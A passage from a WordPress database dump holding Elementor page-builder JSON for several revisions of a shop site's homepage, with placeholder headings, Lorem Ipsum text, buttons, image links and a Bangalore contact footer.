NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8056,1427,'_elementor_page_assets','a:0:{}'),(8059,1428,'_elementor_edit_mode','builder'),(8060,1428,'_elementor_template_type','wp-page'),(8061,1428,'_elementor_version','3.7.7'),(8062,1428,'_wp_page_template','elementor_canvas'),(8063,1428,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\"},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8064,1428,'_elementor_page_assets','a:0:{}'),(8066,1429,'_elementor_edit_mode','builder'),(8067,1429,'_elementor_template_type','wp-page'),(8068,1429,'_elementor_version','3.7.7'),(8069,1429,'_wp_page_template','elementor_canvas'),(8070,1429,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\"},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, 